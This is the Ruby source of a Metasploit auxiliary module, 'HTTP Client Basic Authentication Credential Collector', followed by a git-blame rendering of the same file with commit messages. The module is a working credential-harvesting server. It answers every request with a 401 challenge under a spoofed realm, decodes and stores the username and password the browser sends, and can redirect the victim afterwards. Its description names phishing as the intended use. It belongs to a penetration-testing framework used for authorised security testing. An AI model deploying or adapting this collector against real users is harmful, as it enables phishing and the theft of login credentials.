metasploit-framework/modules/auxiliary/server/capture/http_basic.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Auxiliary::Report

  def initialize(info={})
    super(update_info(info,
      'Name'        => 'HTTP Client Basic Authentication Credential Collector',
      'Description'    => %q{
        This module responds to all requests for resources with a HTTP 401.  This should
        cause most browsers to prompt for a credential.  If the user enters Basic Auth creds
        they are sent to the console.

        This may be helpful in some phishing expeditions where it is possible to embed a
        resource into a page.

        This attack is discussed in Chapter 3 of The Tangled Web by Michal Zalewski.
      },
      'Author'      => ['saint patrick <saintpatrick[at]l1pht.com>'],
      'License'     => MSF_LICENSE,
      'Actions'     =>
        [
          [ 'Capture' ]
        ],
      'PassiveActions' =>
        [
          'Capture'
        ],
      'DefaultAction'  => 'Capture'
    ))

    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The local port to listen on.", 80 ]),
        OptString.new('REALM', [ true, "The authentication realm you'd like to present.", "Secure Site" ]),
        OptString.new('RedirectURL', [ false, "The page to redirect users to after they enter basic auth creds" ])
      ])
  end

  # Not compatible today
  def support_ipv6?
    false
  end

  def run
    @myhost   = datastore['SRVHOST']
    @myport   = datastore['SRVPORT']
    @realm    = datastore['REALM']

    print_status("Listening on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}...")
    exploit
  end

  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: opts[:service_name],
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password
    }.merge(service_data)

    login_data = {
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::UNTRIED,
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  def on_request_uri(cli, req)
    if(req['Authorization'] and req['Authorization'] =~ /basic/i)
      basic,auth = req['Authorization'].split(/\s+/)
      user,pass  = Rex::Text.decode_base64(auth).split(':', 2)

      report_cred(
        ip: cli.peerhost,
        port: datastore['SRVPORT'],
        service_name: 'HTTP',
        user: user,
        password: pass,
        proof: req['Authorization']
      )

      print_good("#{cli.peerhost} - Credential collected: \"#{user}:#{pass}\" => #{req.resource}")
      if datastore['RedirectURL']
        print_status("Redirecting client #{cli.peerhost} to #{datastore['RedirectURL']}")
        send_redirect(cli, datastore['RedirectURL'])
      else
        send_not_found(cli)
      end
    else
      print_status("Sending 401 to client #{cli.peerhost}")
      response = create_response(401, "Unauthorized")
      response.headers['WWW-Authenticate'] = "Basic realm=\"#{@realm}\""
      cli.send_response(response)
    end
  end

end
Some more changes before pushing to master 2012-08-20 20:43:39 +00:00			`##`
Fix up comment splats with the correct URI See the complaint on #4039. This doesn't fix that particular issue (it's somewhat unrelated), but does solve around a file parsing problem reported by @void-in 2014-10-17 16:47:33 +00:00			`# This module requires Metasploit: http://metasploit.com/download`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Some more changes before pushing to master 2012-08-20 20:43:39 +00:00			`##`
Adding aux mod for HTTP Basic Auth capture 2012-08-19 06:51:01 +00:00
use MetasploitModule as a class name 2016-03-08 13:02:44 +00:00			`class MetasploitModule < Msf::Auxiliary`
Adding aux mod for HTTP Basic Auth capture 2012-08-19 06:51:01 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Exploit::Remote::HttpServer::HTML`
			`include Msf::Auxiliary::Report`
Adding aux mod for HTTP Basic Auth capture 2012-08-19 06:51:01 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def initialize(info={})`
			`super(update_info(info,`
			`'Name' => 'HTTP Client Basic Authentication Credential Collector',`
			`'Description' => %q{`
			`This module responds to all requests for resources with a HTTP 401. This should`
			`cause most browsers to prompt for a credential. If the user enters Basic Auth creds`
			`they are sent to the console.`
Updating HTTP Basic capture mod with edits based on MSF team suggestions 2012-08-20 00:47:01 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`This may be helpful in some phishing expeditions where it is possible to embed a`
			`resource into a page.`
Updating HTTP Basic capture mod with edits based on MSF team suggestions 2012-08-20 00:47:01 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`This attack is discussed in Chapter 3 of The Tangled Web by Michal Zalewski.`
			`},`
			`'Author' => ['saint patrick <saintpatrick[at]l1pht.com>'],`
			`'License' => MSF_LICENSE,`
			`'Actions' =>`
			`[`
			`[ 'Capture' ]`
			`],`
			`'PassiveActions' =>`
			`[`
			`'Capture'`
			`],`
			`'DefaultAction' => 'Capture'`
			`))`
Adding aux mod for HTTP Basic Auth capture 2012-08-19 06:51:01 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`register_options(`
			`[`
			`OptPort.new('SRVPORT', [ true, "The local port to listen on.", 80 ]),`
Added 301 Redirect option to Basic Auth module 2014-02-24 20:38:08 +00:00			`OptString.new('REALM', [ true, "The authentication realm you'd like to present.", "Secure Site" ]),`
Fix minor formatting issues 2014-02-25 19:48:37 +00:00			`OptString.new('RedirectURL', [ false, "The page to redirect users to after they enter basic auth creds" ])`
Fix msf/core and self.class msftidy warnings Also fixed rex requires. 2017-05-03 20:42:21 +00:00			`])`
Retab modules 2013-08-30 21:28:54 +00:00			`end`
Adding aux mod for HTTP Basic Auth capture 2012-08-19 06:51:01 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`# Not compatible today`
			`def support_ipv6?`
			`false`
			`end`
Adding aux mod for HTTP Basic Auth capture 2012-08-19 06:51:01 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def run`
			`@myhost = datastore['SRVHOST']`
			`@myport = datastore['SRVPORT']`
			`@realm = datastore['REALM']`
Adding aux mod for HTTP Basic Auth capture 2012-08-19 06:51:01 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`print_status("Listening on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}...")`
			`exploit`
			`end`
Adding aux mod for HTTP Basic Auth capture 2012-08-19 06:51:01 +00:00
Use metasploit-credential API instead of report_auth_info 2015-07-22 06:11:43 +00:00			`def report_cred(opts)`
			`service_data = {`
			`address: opts[:ip],`
			`port: opts[:port],`
			`service_name: opts[:service_name],`
			`protocol: 'tcp',`
			`workspace_id: myworkspace_id`
			`}`

			`credential_data = {`
			`origin_type: :service,`
			`module_fullname: fullname,`
			`username: opts[:user],`
			`private_data: opts[:password],`
More metasploit-credential update 2015-07-23 20:50:50 +00:00			`private_type: :password`
Use metasploit-credential API instead of report_auth_info 2015-07-22 06:11:43 +00:00			`}.merge(service_data)`

			`login_data = {`
			`core: create_credential(credential_data),`
			`status: Metasploit::Model::Login::Status::UNTRIED,`
			`proof: opts[:proof]`
			`}.merge(service_data)`

			`create_credential_login(login_data)`
			`end`

Retab modules 2013-08-30 21:28:54 +00:00			`def on_request_uri(cli, req)`
			`if(req['Authorization'] and req['Authorization'] =~ /basic/i)`
			`basic,auth = req['Authorization'].split(/\s+/)`
			`user,pass = Rex::Text.decode_base64(auth).split(':', 2)`
Adding aux mod for HTTP Basic Auth capture 2012-08-19 06:51:01 +00:00
Use metasploit-credential API instead of report_auth_info 2015-07-22 06:11:43 +00:00			`report_cred(`
			`ip: cli.peerhost,`
			`port: datastore['SRVPORT'],`
			`service_name: 'HTTP',`
			`user: user,`
			`password: pass,`
			`proof: req['Authorization']`
Retab modules 2013-08-30 21:28:54 +00:00			`)`
Updating HTTP Basic capture mod with edits based on MSF team suggestions 2012-08-20 00:47:01 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`print_good("#{cli.peerhost} - Credential collected: \"#{user}:#{pass}\" => #{req.resource}")`
Added 301 Redirect option to Basic Auth module 2014-02-24 20:38:08 +00:00			`if datastore['RedirectURL']`
Used the builtin send_redirect method in Msf::Exploit::Remote::HttpServer instead of creating a redirect inline 2014-02-24 21:59:49 +00:00			`print_status("Redirecting client #{cli.peerhost} to #{datastore['RedirectURL']}")`
Fix minor formatting issues 2014-02-25 19:48:37 +00:00			`send_redirect(cli, datastore['RedirectURL'])`
Added 301 Redirect option to Basic Auth module 2014-02-24 20:38:08 +00:00			`else`
			`send_not_found(cli)`
			`end`
Retab modules 2013-08-30 21:28:54 +00:00			`else`
Used the builtin send_redirect method in Msf::Exploit::Remote::HttpServer instead of creating a redirect inline 2014-02-24 21:59:49 +00:00			`print_status("Sending 401 to client #{cli.peerhost}")`
Retab modules 2013-08-30 21:28:54 +00:00			`response = create_response(401, "Unauthorized")`
			`response.headers['WWW-Authenticate'] = "Basic realm=\"#{@realm}\""`
			`cli.send_response(response)`
			`end`
			`end`
Adding aux mod for HTTP Basic Auth capture 2012-08-19 06:51:01 +00:00
			`end`